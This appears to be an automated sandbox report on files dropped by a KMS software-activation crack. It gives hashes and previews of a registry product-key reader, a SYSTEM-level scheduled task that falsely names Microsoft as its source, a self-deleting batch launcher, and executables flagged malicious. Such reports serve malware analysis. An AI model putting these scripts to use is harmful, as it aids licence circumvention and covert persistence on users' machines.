Preview:7z..'.....z..?......%.......0.f-..5..].w......3.a`.....f...'D.$.."8..S..D...w...g...*..m.D.?....N.8.K..e....n9Q........>.....Z....B.t..0....Dx-...8x.E..V.l...a....{Zu7.U?..@w..S..H.^..aW.[.`be.C?.*8.....?....B<..p.t....H.!.I..49.]..(....4#.c...{.m`:vSB.f(..f...)f..8...7}.w...R.A)t. _i.D...0...MRFJ......R...i..?Sa...S.\..<...K.b...&d.O.4.V.=..t.x...J..(>..w...X.L..A;@..|..[...`(.j}.}.7...M.p..n?..X....@.....].........q.........q'.ld._...{./u;...H.......c~79v..jr=.z........dI:?.....(........S...~.h..f.>L...Y......9.f.&d..G..S.F%.....g........1..R...7/....,.=J.}.f...?.v..D..T..3.Q.5*..`b..us0<h....= ...W...P.`$XI......$.=...E.a.Z.hlv...=/LbB.5...Vo.........0..r..}@.}..%YV1<.7y.L.).FR....U.S.h.q...^..:h.....o.VY...g;.'.Qp.n.O.c...gP..._...]G.\?0.n.$z..WC...1.'.T:./..w....9..I......[e....q.s4S....D_../0"`.X.z.(-~.X.u.g...Q.9...W..-"..A..}.W..O..G...=..?Cg.o9F.8....Sj$b/8..}.5t......<...n.U0..\.Kh.........u..V./!p..IRy(......Pp.7..N..Uu.m8.Y*.l.(.
Process:C:\Windows\_temp07242019502489\7Z.EXE
File Type:ASCII text, with CRLF line terminators
Category:dropped
Size (bytes):1657
Entropy (8bit):5.01969535530697
Encrypted:false
SSDEEP:48:DVe8NhjPG9lrRtFf1f0WSIoQCvYBBNyJS1GDof0psks2rVb:DVe8NhjuFtHf0rQCwBBNyJS1GDgOFs2l
MD5:4C89CFC5BAF95E76753A0B7EDC719FA8
SHA1:9BBB6BE39966F5BEA18719F0B5F8A40DF34C2827
SHA-256:0B815BA61B8C7DFA70B7C35D686E910E1E15222FEFC3F0927C0C64BDB50A0BA6
SHA-512:EF0D0BD247BC5FC0B55A40D5C6D7D5DB9068209898E371DB5035C91257B90FBC750A993FE76C58F08AF1956B364AC363C5D6322ABA0373FAA67A55F4E7E532DB
Malicious:false
Preview:Option Explicit..Dim objshell,path,DigitalID,ProductKey,edition,keys..Set objshell = CreateObject("WScript.Shell")..Path = "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\"..DigitalID = objshell.RegRead(Path & "DigitalProductId")..ProductKey = ConvertToKey(DigitalID)..Save ProductKey....Function ConvertToKey(Key).. Const KeyOffset = 52.. Dim isWin8, Maps, i, j, Current, KeyOutput, Last, keypart1, insert.. 'Check if OS is Windows 8.. isWin8 = (Key(66) \ 6) And 1.. Key(66) = (Key(66) And &HF7) Or ((isWin8 And 2) * 4).. i = 24.. Maps = "BCDFGHJKMPQRTVWXY2346789".. Do.. .Current= 0.. j = 14.. Do.. Current = Current* 256.. Current = Key(j + KeyOffset) + Current.. Key(j + KeyOffset) = (Current \ 24).. Current=Current Mod 24.. j = j -1.. Loop While j >= 0.. i = i -1.. KeyOutput = Mid(Maps,Current+ 1, 1) & KeyOutput.. Last = Current.. Loop While i >= 0.. keypart1
Process:C:\Windows\_temp07242019502489\7Z.EXE
File Type:Windows WIN.INI
Category:dropped
Size (bytes):2908
Entropy (8bit):6.126229204774281
Encrypted:false
SSDEEP:48:qhviJbGJu2OIe/2OpQOHd3GytLXtBJFRK6lygPFePuU6u2PaEoL1uIyF8pE9aOt3:qEJbj2e1lwyrBzRKUyEyuU6vaEoxuIyF
MD5:B74971F1FE581CF08E8F69124F5F2BCD
SHA1:DC56FF99D0204BD44928A925054F52D1C38C68F1
SHA-256:B7DEA91768212BC915345F82B9165F3BDEF0F4333EA6738AC800758296FB5B00
SHA-512:DD66BF6D9A03EB10027AE739AB2A97A481FCA8778A4A5546275A2E266FD022B1E02B91D3E2D37D86B6C4BB7D895575B0B4CFA6D7C8289FF635246585FBDE366C
Malicious:false
Preview:[Windows]..Edition=..Key=....[Office]..Office2010Key=..OtherOfficeKey=....[UninstOffKey]..Office2010Last5Key=..OtherOfficeLast5Key=......................======================================================================...................................HEU_ConvertWindows.ini.....HEU_KMS_Activator_*.exe.......======================================================================....1.....Windows ..... 1.....[Windows].."Key="............Key=XGVPP-NMH47-7TTHJ-W3FW7-8HV2C......2.....Office ..... 1.....Office2010........[Office].."Office2010Key="........ 2.........Office(..Office2010)........[Office].."OtherOfficeKey="............3.....Office ..... 1.....Office2010........[UninstOffKey].."Office2010Last5Key="......(.........5.).. 2.....Office(..Office2010)........[UninstOffKey].."OtherOfficeLast5Key="......(.........5.)......4.....Windows10...... 1......Edition=......,....Edition=Education...
Process:C:\Windows\_temp07242019502489\7Z.EXE
File Type:XML 1.0 document, ISO-8859 text, with CRLF line terminators
Category:dropped
Size (bytes):2240
Entropy (8bit):5.3781166532340645
Encrypted:false
SSDEEP:48:cCu+DiTl4l0pbxE6Q2L60uydbQx3YODOLedqBslIN2uS:Lu+DiTl4wtar0uydbQZdqBslI4
MD5:A381B30E51AC126F51F421E082DE0EA7
SHA1:5F847E828BD7B5DD0D02F4C505FCB084C69B068C
SHA-256:84DE47C26A7379EF5C31AD5452372E7477BFB739E2684D31C0DB22CBED56D401
SHA-512:89CACEE08884390F06F79E4E41481EB90363099AA7DA960EE3CEF8CFCEF03623105FE0BE7AD2C88077B42EBC5EFB21E5D713607850F48A191708298F34323180
Malicious:false
Preview:<?xml version="1.0" encoding="UTF-16"?>..<Task version="1.3" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">.. <RegistrationInfo>.. <Source>Microsoft Corporation</Source>.. <Date>1999-01-01T12:00:00.34375</Date>.. <Author>RPO/WindowsAddict</Author>.. <Version>1.0</Version>.. <Description>.30..............</Description>.. <URI>\HEU KMS Renewal</URI>.. <SecurityDescriptor>D:P(A;;FA;;;SY)(A;;FA;;;BA)(A;;FRFX;;;LS)(A;;FRFW;;;S-1-5-80-123231216-2592883651-3715271367-3753151631-4175906628)(A;;FR;;;S-1-5-4)</SecurityDescriptor>.. </RegistrationInfo>.. <Triggers>.. <CalendarTrigger>.. <StartBoundary>1999-01-01T12:00:00</StartBoundary>.. <Enabled>true</Enabled>.. <ScheduleByDay>.. <DaysInterval>30</DaysInterval>.. </ScheduleByDay>.. </CalendarTrigger>.. </Triggers>.. <Principals>.. <Principal id="LocalSystem">.. <UserId>S-1-5-18</UserId>.. <RunLevel>HighestAvailable</RunLevel>.. </Principal>.. </Prin
Process:C:\Users\user\AppData\Local\Temp\HEU_KMS_Activator.exe
File Type:7-zip archive data, version 0.4
Category:dropped
Size (bytes):1807018
Entropy (8bit):7.999894560057019
Encrypted:true
SSDEEP:49152:AvAFxpIyAuLjnXQsP2snIbrYpnvnjo8yOgICCvi:AvAFLIGLz5PtnIfYFnjoG0
MD5:E95E0A57CAF3E24C190CD303AABABA7A
SHA1:25C8A267FE760BAF9B638D39AF73806034B6B3E8
SHA-256:CE54BD0CA93B73BBBFC2AFBB2C6F7159D83A3A5CAEB92146D850765A1B6A9DA0
SHA-512:033E112700C8C2BB4E4D68852AD959608B7BE4FA46FABDE41C05FFEA69982A8F440684AA93F0A686D65FE5E4394B7D5D3DFD1924D44B2ABBF6DA0256B9B49E9C
Malicious:false
Preview:7z..'...>...f.......$.........&......]........s...O.u....S8..u.+.w......".w...4. b......A`...5T-5.5..2.........K'......p!.......h.I.I....K..y~.s..o....._M........s.M4..GqcP..a.\..].4l.{.H..{...(+.......7>8p....j.9j..J..:.8F..c.4y3...vP.].V(p....R=.M,4.X.-..h.^...3.H..Kn..xO.&..|..P.u....q8..hRt..._..hE.o...c5..hw...l.I......n,H...A......J...p*..$.0..'.V...1)..[w.Rkk...n`.]3o.g...E.Q...E.Ugff.%...t.x...{...;.D.W.,.V[..@..Y.?h(...5..>&VNp..T.> .2...K?...A.....%.|P6.Ekyv.`..@F....T...F...7...I....b... .w?....J..... .`a.........j.>.-...w.d.4\.'a............l.0g.Sh...]..dh<..3.4a.nT../]v..3C.p-,..ih.|.J...`o..v.....z....Y...+.(..Sb..a.\M1....C9+\....GL.._.'.,a..Vo..G...1U... d|...G.]....V*......E{+.J.M..."..\-..J.I.K...Isgx.?.. `...W3...B=.n..`.....w.la.5.m".2.........`@..L.....n......G.&...d.d.=.dLT.5:S*U |*.....a..#.b^|.S..1.O.....7{.l..'HB%..0e.s.~U....x...W%U...9wO.O..ZKG..:.~V_.....8.....*..y.p...%...J@.......u...........~}R.T.4.w.W.}..A
Process:C:\Windows\_temp07242019502489\7Z.EXE
File Type:ASCII text, with CRLF line terminators
Category:dropped
Size (bytes):49433
Entropy (8bit):4.6791150913001704
Encrypted:false
SSDEEP:768:yzG3Pbt5Q8RxIQs191LpE/hygKoypaXHDvjw3OnCYk2N6aI3FPqlrl1VKXP+Pm1S:ya37QdgGpwZV
MD5:572E9A87757AC96C7677FD1B1B113C55
SHA1:9C8B96971997CD2DC0ED14F19DD9BC56D3348C3A
SHA-256:008CF05944053116A095AD466561D3FD4BE8A7DE79E5ADA7C5DAAB492F730465
SHA-512:BF670754942CFA839DE4A31676A3BA2AC8CD1A00DE6F1B70AFF995E14A9C489E996E9A019898EC3470A11D02C14AB7A8FE4855A8F028D6B4EA987E51411D7BE3
Malicious:false
Preview:'////////////////////////////////////////////////////////////////////////////////////////..'////////////////////////////////////////////////////////////////////////////////////////..CONST wshOK =0..CONST VALUE_ICON_WARNING =16..CONST wshYesNoDialog =4..CONST VALUE_ICON_QUESTIONMARK =32..CONST VALUE_ICON_INFORMATION =64..CONST HKEY_LOCAL_MACHINE =&H80000002..CONST KEY_SET_VALUE =&H0002..CONST KEY_QUERY_VALUE =&H0001..CONST REG_SZ =1..CONST OfficeAppId = "59a52881-a989-479d-af46-f275c6370663"..CONST STR_SYS32PATH = ":\Windows\System32\"..CONST REG_SPP = "SOFTWARE\Microsoft\OfficeSoftwareProtectionPlatform"..'////////////////////////////////////////////////////////////////////////////////////////..CONST MSG_NOREGRIGHTS = "Insufficient rights to
Process:C:\Windows\_temp07242019502489\7Z.EXE
File Type:ASCII text, with CRLF line terminators
Category:dropped
Size (bytes):33019
Entropy (8bit):4.817205605590509
Encrypted:false
SSDEEP:384:UtZhdl54F7qir44eZut5tCTmZKpdBcwOvHWd+NVLVGZwZkIVYaBCobd/q5NvSVly:Iswk6CLzz9Dl6jSz8d
MD5:DF1EF05879E06C5F09F3E1022F37B5CB
SHA1:23AAAC40BAEC28397BB59CFA584E165062D18506
SHA-256:D49ADF2DABBBF6AA43CE4E336AF4F768207DF75302EBF568A94A5350AAC988C5
SHA-512:78F0D21538483D3BAC9D8B409554AC89A98A4943666F0FF88207831AB3E1D264C2EFA0EA0E4703375AA15516809353F9B7477561A0A4FFE0B930B3E39F8B7E07
Malicious:false
Preview:<Strings>..<err0xC004B001>The activation server determined that the license is invalid.</err0xC004B001>..<err0xC004B002>The activation server determined that the license is invalid.</err0xC004B002>..<err0xC004B003>The activation server determined that the license is invalid.</err0xC004B003>..<err0xC004B004>The activation server determined that the license is invalid.</err0xC004B004>..<err0xC004B005>The activation server determined that the license is invalid.</err0xC004B005>..<err0xC004B006>The activation server determined that the license is invalid.</err0xC004B006>..<err0xC004B007>The activation server reported that the computer could not connect to the activation server.</err0xC004B007>..<err0xC004B008>The activation server determined that the computer could not be activated.</err0xC004B008>..<err0xC004B009>The activation server determined that the license is invalid.</err0xC004B009>..<err0xC004B011>The activation server determined that your computer clock time is not correct. You m
Process:C:\Windows\_temp07242019502489\7Z.EXE
File Type:ASCII text, with very long lines (597), with CRLF line terminators
Category:dropped
Size (bytes):105538
Entropy (8bit):4.985953705856459
Encrypted:false
SSDEEP:768:cE863JLs+lPbt5QmRxIQsNI9dmwPpEW4hygKoypaqrxkV3h20NtMDJI0YlBsYk28:F8fEzb/rgGpRrjDJkCkRFklYWCDUb
MD5:885B4DAE3623B427B8F04A7BC88780B9
SHA1:8B743A9749FA6EA82C3D1554965E1BCEF2567173
SHA-256:6BC8E3991DA8C6527B3588E8F95068665918B685299CBB16BA6CC0C484BFE072
SHA-512:C5CABAAF9321A63D679014E7B27271181157A76A1888D58E2E5E44D5ED79EF1E70C1173390E2B1CF49327AD2559A2D1A6DBDB0072E437A055CFBA9AACE78DC13
Malicious:false
Preview:'Copyright (c) Microsoft Corporation. All rights reserved...'////////////////////////////////////////////////////////////////////////////////////////..'////////////////////////////////////////////////////////////////////////////////////////..CONST wshOK =0..CONST VALUE_ICON_WARNING =16..CONST wshYesNoDialog =4..CONST VALUE_ICON_QUESTIONMARK =32..CONST VALUE_ICON_INFORMATION =64..CONST HKEY_LOCAL_MACHINE =&H80000002..CONST KEY_SET_VALUE =&H0002..CONST KEY_QUERY_VALUE =&H0001..CONST REG_SZ =1..CONST OfficeAppId = "0ff1ce15-a989-479d-af46-f275c6370663"..CONST STR_SYS32PATH = ":\Windows\System32\"..CONST STR_OSPPREARMPATH = "\Microsoft Office\Office16\OSPPREARM.EXE"..CONST STR_OSPPREARMPATH_DEBUG = "\Microsoft Office Debug\Office16\OSPPREARM.EXE"..CONST REG_OSPP
Process:C:\Windows\_temp07242019502489\7Z.EXE
File Type:ASCII text, with CRLF line terminators
Category:dropped
Size (bytes):36336
Entropy (8bit):4.835301983494741
Encrypted:false
SSDEEP:384:UtZhdl5cFZFqCr44eZutlCTmZbpdBcwOvHWd+NVLVGZwZkRVYF2IlTBCobd/q5Ns:YUkZLI9Dz6fZEz8d
MD5:36F7DADFE84E62DA00292D0569C3F523
SHA1:95D03EBD29CDCB908EFD78A0A945D848B6F035E8
SHA-256:B3378A3178F3E52094DB20E8A828011CD8882017919522A544BAEF3057BD11D3
SHA-512:1E4C952A4C1BD0BCBC9FBAF1370DA595A2E97ABAE854A8CCFD276ECB9DD8ADF55117F3CE053BDBD45D87A761439764DCADA7564245025F3F97AB2CAA6A0B4691
Malicious:false
Preview:<Strings>..<err0xC004B001>The activation server determined that the license is invalid.</err0xC004B001>..<err0xC004B002>The activation server determined that the license is invalid.</err0xC004B002>..<err0xC004B003>The activation server determined that the license is invalid.</err0xC004B003>..<err0xC004B004>The activation server determined that the license is invalid.</err0xC004B004>..<err0xC004B005>The activation server determined that the license is invalid.</err0xC004B005>..<err0xC004B006>The activation server determined that the license is invalid.</err0xC004B006>..<err0xC004B007>The activation server reported that the computer could not connect to the activation server.</err0xC004B007>..<err0xC004B008>The activation server determined that the product could not be activated.</err0xC004B008>..<err0xC004B009>The activation server determined that the license is invalid.</err0xC004B009>..<err0xC004B010>The activation server determined that required business token entry cannot be found.<
Process:C:\Windows\SysWOW64\cmd.exe
File Type:ASCII text, with CRLF line terminators
Category:modified
Size (bytes):87
Entropy (8bit):4.978871554845339
Encrypted:false
SSDEEP:3:kj/rN0nacwRE2J5xAI+dBGqT4T:kzrNcNwi23fWT4T
MD5:3ADA3C4BD6F9A7EEA09B2EF1EE8EF750
SHA1:BD0A1F8FF51714764AB31FBEB05F9DD6F7BA05D1
SHA-256:2A1A386FA86631D77900CBFB49F464FD29FD14F8D3800AF009305A8599969EB2
SHA-512:F03FA1B67571F118BF478615CCE4B0BDD5E040CD72AEABA7400E867DF489510BB61F7003549F552E3A541B3E85C1A61CC2DDBCBA3916FA3BA5EABF0200FCA647
Malicious:false
Preview:[Direction] ..Dir=C:\Users\user\AppData\Local\Temp ..Name=HEU_KMS_Activator.exe ..
Process:C:\Windows\_temp07242019502489\7Z.EXE
File Type:DOS batch file, ASCII text, with CRLF line terminators
Category:dropped
Size (bytes):166
Entropy (8bit):5.0500117944636305
Encrypted:false
SSDEEP:3:/qQKVnil/I+KJbGqT4xLVXqta6dWuGqT4HJCaFtgPmGqT4KoZs+RMA:/kVn/pfT4xpd6d1T4HMaAcT4KopRMA
MD5:86649FF39833B7D35CC5B7884025BFC5
SHA1:BB4445B7C8A8A1609B499BC027CE8B2AA8AF3405
SHA-256:EFF981009C7DA55761B6DEA254C2BD6EA909CB46F27632FA471D597189D5FF94
SHA-512:965FD9B1272492E55EFA0C4B31EA2FAAEBEFBA32E4B03840C71451D8A22BF628991DA9A84EB0F16CA6FE302BDBB1AF5B0E65DEEAB31D51B2DFE54DC365580238
Malicious:false
Preview:@ECHO OFF..pushd "%~dp0"..start /wait HEU_KMS_Activator.exe /windows /renewal..if exist HEU_KMS_Activator.exe (del /s /q HEU_KMS_Activator.exe >nul)..del %0..exit..
Process:C:\Windows\_temp07242019502489\7Z.EXE
File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:dropped
Size (bytes):4258
Entropy (8bit):3.637219457662655
Encrypted:false
SSDEEP:48:yeiqq9oqAXvM5p+8wdsV7gP9oItLV2Qn1ab9Q9V9Lvara+iniudupRCRf9ufAuRy:cJ+z3Vvnkp+GdinigV9ll7UY5HAmzw+
MD5:ADE0007995DA8218A924EAE18DD5FFA4
SHA1:DE4480D869DF4E45E666E3BA74C87786D2BA01E9
SHA-256:6C4C7816D99652A6248E8877AC24D341B3D87BB1E7A6BE159EACBB6B6BC61352
SHA-512:25576DD5103C8F677452EDE6BBD1DED407F290741F0E30294DDFBE54D43BE98A7F9601A3D722A997041980DA083D7DE7DA9B2E9525D920CC207143BD60FFEE95
Malicious:false
Preview:<?xml version="1.0" encoding="UTF-16"?>..<Task version="1.3" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">..  <RegistrationInfo>..    <Source>Microsoft Corporation</Source>..    <Author>Microsoft Corporation</Author>..    <Version>1.0</Version>..    <Description>This task restarts the Software Protection Platform service when user logon occurs</Description>..    <URI>\Microsoft\Windows\SoftwareProtectionPlatform\SvcTrigger</URI>..    <SecurityDescriptor>D:P(A;;FA;;;SY)(A;;FA;;;
Process:C:\Users\user\AppData\Local\Temp\HEU_KMS_Activator.exe
File Type:7-zip archive data, version 0.4
Category:dropped
Size (bytes):515101
Entropy (8bit):7.999632298329647
Encrypted:true
SSDEEP:12288:hiUueKswiHeFY4aND7fBUNJA88M4n44EZVcHv5IoeOs9iX76vMHao:D5wE4a1W488MB9Z4BI9O76v9o
MD5:10A8C081F96DC74DACA5F0BA91045B36
SHA1:F7B32E796ABE8A806F40148F2E67EA8DC09F9490
SHA-256:1E1B06B1BDA8D90232F1B96C116603001C9F56EBCF28F2790533B5825BC475DD
SHA-512:7164F5BBFD6959E1D1D2809DCD42E46499DDD680FA9C8E521E88ECDFDBCFCE49C834580FEBC775785C9431EE87063A4909034C4B474FFECEB53C8C84B1775BCF
Malicious:false
Process:C:\Users\user\AppData\Local\Temp\HEU_KMS_Activator.exe
File Type:7-zip archive data, version 0.4
Category:dropped
Size (bytes):862741
Entropy (8bit):7.999021184950542
Encrypted:true
SSDEEP:24576:c2/RWRiVf6KUw/KacmqZooybsSViudCbEio:cZiUKzEZAsSzaS
MD5:F7229B58B678638D30DE2AA2E2B23D08
SHA1:37C374C09921C968853D220A3288E087F3DBB0AF
SHA-256:25E1EE2D65C00543E5855299CE396F52C411D8E8E49A8FAB4D90A2B21E65711C
SHA-512:2DC4BAE503EFD6A1E56C09431524AB9207E1A63AAF4E63A912A389F3831895E3794AC1F632EB353036AA477521DFFFC6F0FF78CA79938F29FAB68FEA9625C4F3
Malicious:false
Process:C:\Windows\_temp07242019502489\7Z.EXE
File Type:PE32 executable (console) Intel 80386, for MS Windows
Category:dropped
Size (bytes):50176
Entropy (8bit):6.986513386510911
Encrypted:false
SSDEEP:768:ni4+3t40RYpj0yuv52OFF/n16CRqXwW214U/ZJuEnotvrprIWtYDsJSUhX:ElYAvLFF/n1FcSPZYFvrprIW2sJSu
MD5:87821AB4AACB291B97212B4F39F2579D
SHA1:1F2FDCC271BFA7A104A999D01942FB1E3C42DA34
SHA-256:034F12590C9FC94021FCF9A1DD22BE3C38C2AF34BA7DCDB9B8F2C6B628E3AF95
SHA-512:E7B8FBD99C6E24C7912053BBFFF1AEE8E10A6196A5D75ADECD259814500EE5C841E963CE04D0515FCC0720017764052A681D0587F81BA95A092E60E424A5DF31
Malicious:true
Antivirus:
  • Antivirus: ReversingLabs, Detection: 33%
Process:C:\Windows\_temp07242019502489\7Z.EXE
File Type:PE32 executable (console) Intel 80386, for MS Windows
Category:dropped
Size (bytes):38912
Entropy (8bit):6.678077840928496
Encrypted:false
SSDEEP:768:Rum0N2cc22MX2CFa/bCHhebFVcbDvI2xPwPqkjdn3BAmqlyc:Rx0QcxnNa/bIhc+LvWjd3ym
MD5:B87FC65EEFF6A9AD80F95BF6825B53CE
SHA1:2F024C0250EDF670E26C110C3E6907B48F1659EA
SHA-256:9F8A7B4CA21FF277D07291590CB6BD05983CD00CA232E15383394EF95FE72D7E
SHA-512:6706CCCBE195FCEE870E28CD28268D3334850E2FCB1D7445DD9C8738E2BF670B183E9BA638A61771E90B642538D4C331C7191EB6906D3988002FBF2027679739
Malicious:true
Antivirus:
  • Antivirus: ReversingLabs, Detection: 49%
Process:C:\Windows\_temp07242019502489\7Z.EXE
File Type:PE32 executable (GUI) Intel 80386, for MS Windows
Category:dropped
Size (bytes):974336
Entropy (8bit):6.906832511172037
Encrypted:false
SSDEEP:12288:wCdOy3vVrKxR5CXbNjAOxK/j2n+4YG/6c1mFFja3mXgcjfRlgsfBgayQPM2qmG90:wCdxte/80jYLT3U1jfs3ayQPHGrHlQ
MD5:8AE655A25B75EFC289CC29E1A25D0B10
SHA1:BBC8D50E62915FEB25405C2292DED95996CBD5D4
SHA-256:78AAF80445A9323FB0EFADDFA5A411941C0A2C1A8BACEE10185F3CE82D0C731C
SHA-512:9B7428B03D00C593317541D11DBCC03F3B769195E30E1A9E00EFD18451511D0E03CC32EFB0039456B536FBCDDCB8393DBD003C891D59531337F06E034DA7EB47
Malicious:true
Antivirus:
  • Antivirus: Joe Sandbox ML, Detection: 100%
  • Antivirus: ReversingLabs, Detection: 56%
Process:C:\Windows\_temp07242019502489\7Z.EXE
File Type:PE32+ executable (GUI) x86-64, for MS Windows
Category:dropped
Size (bytes):1092608
Entropy (8bit):6.6790762126241665
Encrypted:false
SSDEEP:24576:DfTkD0E003ubc2MRgCmP/ZwIDzq+Iha9a0HMQuBGrH:zG00SSgCmP/ZwYj44a0sQu0r
MD5:99DF73A907996E98E96917FAE743B506
SHA1:A2399225048B685C15E34A1880BDB619D352D0DC
SHA-256:DEA555536F4AE87A381111E07F9058E4111170AE273863774A52ADA531114A65
SHA-512:CBE1F85EEC790E0979EA115EAC5716DF1F9A86B078B72A8C2637BA49DBB95787937F177E976ED877316915327346B409E71F91D970DF82D5E8D3D26F53B8EB4B
Malicious:true
Antivirus:
  • Antivirus: ReversingLabs, Detection: 4%
Process:C:\Windows\_temp07242019502489\7Z.EXE
File Type:JPEG image data, Exif standard: [TIFF image data, big-endian, direntries=12, height=59, bps=0, PhotometricIntepretation=RGB, orientation=upper-left, width=59], baseline, precision 8, 59x59, components 3
Category:dropped
Size (bytes):15909
Entropy (8bit):6.635110274937036
Encrypted:false
SSDEEP:192:c8ZesNAd28y4vay9x8ZesNAetgkn8577iUYNMtKw0cJKRjGj95aXCXFHY9:9uoPURGuQbn897iUYNg70/Rj+97HY9
MD5:DFC65F2CF9A20AF7E6BC1D1A313E1832
SHA1:B2AA96DE85E9DB278A95C460CC39423FC809A322
SHA-256:7AA09C46EB983C490304319D6CC455A17F77631C13F7053B3D2DCF1B95F0EF89
SHA-512:DE1F6C0C38BFD9410862403C8D3D35B9D4F373239BA3A1B9BD00481CA2A5EE2F560D78A15357EB0CED5197629146ABE7557B42838B88B5DA7D1007A5100174B4
Malicious:false
Process:C:\Windows\_temp07242019502489\7Z.EXE
File Type:MS Windows icon resource - 8 icons, 48x48, 8 bits/pixel, 32x32, 8 bits/pixel
Category:dropped
Size (bytes):26694
Entropy (8bit):4.143707547504497
Encrypted:false
SSDEEP:384:42PbHmDp+TDNc8e8n9Y4bNpuNEd/wIIV0aWxHCH:4oSpCDxeS9Y4nuGd66pCH
MD5:DBA1C0CE8EC65699B8C955A243E68BE2
SHA1:2E7A0707D98B7BDAA42E51FE8B811E64508E26D8
SHA-256:1041B38106701F2E556D0939E1070725EB490FE83F1A5ED0956C0894639DF945
SHA-512:A85915E6B3E336D1B6A325C0863243C3BA4650B0CF54FC2ABB99CDD58611D2BBE2E93E660CF1FC43B3627F702E295A5422D20D6FF65C8EF3AAD2061C7A735749
Malicious:false
Process:C:\Windows\_temp07242019502489\7Z.EXE
File Type:PC bitmap, Windows 3.x format, 46 x 46 x 24, image size 6442, resolution 3779 x 3779 px/m, cbSize 6496, bits offset 54
Category:dropped
Size (bytes):6496
Entropy (8bit):4.6593183689453745
Encrypted:false
SSDEEP:96:POqX7999EYqJFiEv4Y/9y/kDUwpaUvQh54ZbLsDpkU7pE840OlpS:PHuniKvisU7mbLsDpkU7pE848
MD5:81468764F0D9EB0466FD6D60E478848C
SHA1:BCD61CFD3AC185A55C1E911525452FF2E1ABB277
SHA-256:A786CB47A0561CFE54C56F21A3BD77669A755DD236A99E5660C245C2063FF92D
SHA-512:5B88936D7BB69518687A3519223CB54B2DFB01BC49B889DC1C2FDE0CA73DCDF147964C7362E8086B8BAB87BA51495223F1BAA6A2EBCC4F05EA0C24520E1B6529
Malicious:false
Process:C:\Windows\_temp07242019502489\7Z.EXE
File Type:JPEG image data, Exif standard: [TIFF image data, big-endian, direntries=12, height=91, bps=0, PhotometricIntepretation=RGB, orientation=upper-left, width=217], baseline, precision 8, 91x91, components 3
Category:dropped
Size (bytes):33454
Entropy (8bit):7.472311194218384
Encrypted:false
SSDEEP:384:pABxCGILTfZPYoABxCGILTfC9snrDTLpCiWfYNg70bEG7Z1KG8ZUAVvvBByU9BL1:pABI5PNABIi9soYy27Z4GzAV3t
MD5:362E94B6AD5AC32CED1E9C84B7409506
SHA1:094584059B3E3462DA4298B651A92D1FD0691325
SHA-256:1F81E6D61080ADBBACB425C21BC9FC8EB33269DA462CBF00FBF6BE3BDB14C308
SHA-512:672A21FFBDC578E820E307ACEF68BD1CB0A252ADC3E2DD6F097FB6320BB313F89711E71C232589B78BB856323E062424A73EDFD5720A68E4D7B67C044CC7FDAB
Malicious:false
Process:C:\Windows\_temp07242019502489\7Z.EXE
File Type:JPEG image data, Exif standard: [TIFF image data, big-endian, direntries=12, height=91, bps=0, PhotometricIntepretation=RGB, orientation=upper-left, width=217], baseline, precision 8, 91x91, components 3
Category:dropped
Size (bytes):34696
Entropy (8bit):7.482507208526178
Encrypted:false
SSDEEP:384:FDwDFEsEITYGjcNA6PYfcwDFEsEITYGjcNAh9snuDTLpCiQfYNg70brtJBSWS1mV:aDFEGx6PG1DFEGxh9sZYyatJwPuDYU
MD5:D3A12977FFFC2002685151F0AF5143EA
SHA1:AC3C887BEE44748FA9192AAA32606EA768B9E459
SHA-256:F046F91EAC3DBE86D9E2DCC11281CA855A96F15A8F8ED62F0216F3076826FA35
SHA-512:4247AEE80B6F55466D4BA2FC6B3D9BA76575CBDBC74B96CB810768D396C1E7469CBCC2D81CD4F7C79A39BF1A69AD3FD14A97E97156D6FF2EF43E4C56BE5885D0
Malicious:false
Process:C:\Windows\_temp07242019502489\7Z.EXE
File Type:JPEG image data, Exif standard: [TIFF image data, big-endian, direntries=7, orientation=upper-left, xresolution=98, yresolution=106, resolutionunit=2, software=Adobe Photoshop CS5.1 Windows, datetime=2019:03:29 19:59:23], baseline, precision 8, 180x19, components 3
Category:dropped
Size (bytes):28689
Entropy (8bit):7.2502565225542694
Encrypted:false
SSDEEP:384:6aYNg7ZJEisYNg7ZJFnqR3lYNg70TX0QS8WnS+O3EYiffPizJkOg:6aYyfEXYyfFsYyZQS3STEXfHizJkOg
MD5:069D803D68FA5BB3BADE568A8F6BC1CE
SHA1:DBB7B41831D705B762A2B87A6F8E7CB4EE6FC9E5
SHA-256:9C047B20F9BAA9FDEADD70D93CCE5FC5F31D1C4F446CB2D9ACC523209E6C75E3
SHA-512:ABEB1E94BC63FDC5496B354B8788CDB249E92B0FE0829F8A0052F5B8D4F09309B62DBC85F2FE1370C527F97F9E45AC0AABDE44BEDF9175792DB90131432BE885
Malicious:false
Process:C:\Windows\_temp07242019502489\7Z.EXE
File Type:JPEG image data, Exif standard: [TIFF image data, big-endian, direntries=12, height=36, bps=0, PhotometricIntepretation=RGB, orientation=upper-left, width=80], baseline, precision 8, 76x34, components 3
Category:dropped
Size (bytes):17774
Entropy (8bit):6.857847680490455
Encrypted:false
SSDEEP:384:SL8JSc9yWPiuL8JSc9EvnypCSClikYNg703Vieip+4/CC:Xb9yWPSb9EvypPkYyMVEz
MD5:EA96D8162A586640D7AC631F52B83372
SHA1:36984EC6B439CD61210B80BA29C46348310AECDD
SHA-256:5E74AC75BF1609AA8E05316D19121E24B095B6796DD330D6FA7A6C084DB2C03B
SHA-512:F561B801AEC17D899C260DCB06D46B8664F82E9BE6CB6791C567FFD76C175A1EB2668A9F4806B403DB8C9ECA343C906562771B88A45D67FC2B197BB5F0CC2CEB
Malicious:false
Process:C:\Windows\_temp07242019502489\7Z.EXE
File Type:JPEG image data, Exif standard: [TIFF image data, big-endian, direntries=7, orientation=upper-left, xresolution=98, yresolution=106, resolutionunit=2, software=Adobe Photoshop CS6 (Windows), datetime=2019:08:13 22:26:06], baseline, precision 8, 59x59, components 3
Category:dropped
Size (bytes):16885
Entropy (8bit):6.864092276009675
Encrypted:false
SSDEEP:384:jj1GgLPYR1GgunvnXbi5YNg70/B7EP0EwE4CMl:jj1G4PS1GtnvwYyWEhPE
MD5:A1C4BF7146746082146397E5197682A0
SHA1:C26C7D9466B7CAF5859DC721192E0562ACEF565A
SHA-256:D97A73D83088B4DE0B333307893B1C66924BC5276A5413DC1C9C2C4B09B5F97A
SHA-512:7534D1B48B15590DD273B11FD869230752259D0C7C1926C8D08E179FEFA4C4AA54BB0D623E44856650496EDE4BAE2D3E8FA864D604CBC3EC9379A35147CEC5D2
Malicious:false
